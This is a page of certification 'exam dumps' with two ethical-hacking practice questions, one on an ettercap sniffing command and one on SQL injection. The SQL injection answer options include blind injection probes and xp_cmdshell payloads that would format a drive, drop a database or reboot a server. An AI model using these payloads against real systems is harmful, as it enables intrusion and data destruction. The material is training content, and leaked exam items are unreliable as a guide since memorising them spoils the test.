Free GAQM CPEH-001 Exam Dumps - Page 2

Question No: 11

MultipleChoice

Exhibit:

ettercap --NCLzs --quiet

What does the command in the exhibit do in ''Ettercap''?

Options

AThis command will provide you the entire list of hosts in the LAN

BThis command will check if someone is poisoning you and will report its IP.

CThis command will detach from console and log all the collected passwords from the network to a file.

DThis command broadcasts ping to scan the LAN instead of ARP request of all the subnet IPs.

Question No: 12

MultipleChoice

Exhibit:

You are conducting pen-test against a company's website using SQL Injection techniques. You enter ''anuthing or 1=1-'' in the username filed of an authentication form. This is the output returned from the server. What is the next step you should do?

Options

AIdentify the user context of the web application by running_
http://www.example.com/order/include_rsa_asp?pressReleaseID=5
AND
USER_NAME() = 'dbo'

BIdentify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype='U'), 1))) > 109

CFormat the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
xp_cmdshell 'format c: /q /yes '; drop database myDB; --

DReboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND xp_cmdshell 'iisreset --reboot'; --

Limited Time Offer

25%

Off

Get Premium CPEH-001 Questions as Interactive Web-Based Practice Test or PDF